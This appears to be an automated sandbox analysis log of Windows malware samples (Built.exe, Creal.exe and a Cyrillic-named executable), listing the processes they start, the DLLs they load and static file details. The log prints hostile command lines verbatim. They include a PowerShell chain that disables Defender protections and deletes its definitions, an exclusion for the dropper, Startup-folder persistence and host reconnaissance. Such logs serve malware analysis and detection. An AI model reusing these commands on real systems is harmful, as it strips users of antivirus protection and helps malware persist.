              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\Creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.me"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.me
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe"
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.me
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: dxgidebug.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Built.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Creal.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: vcruntime140.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: libffi-8.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: vcruntime140_1.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: libcrypto-3.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: libssl-3.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: sqlite3.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: textinputframework.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: coreuicomponents.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic file information: File size 24810296 > 1048576
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
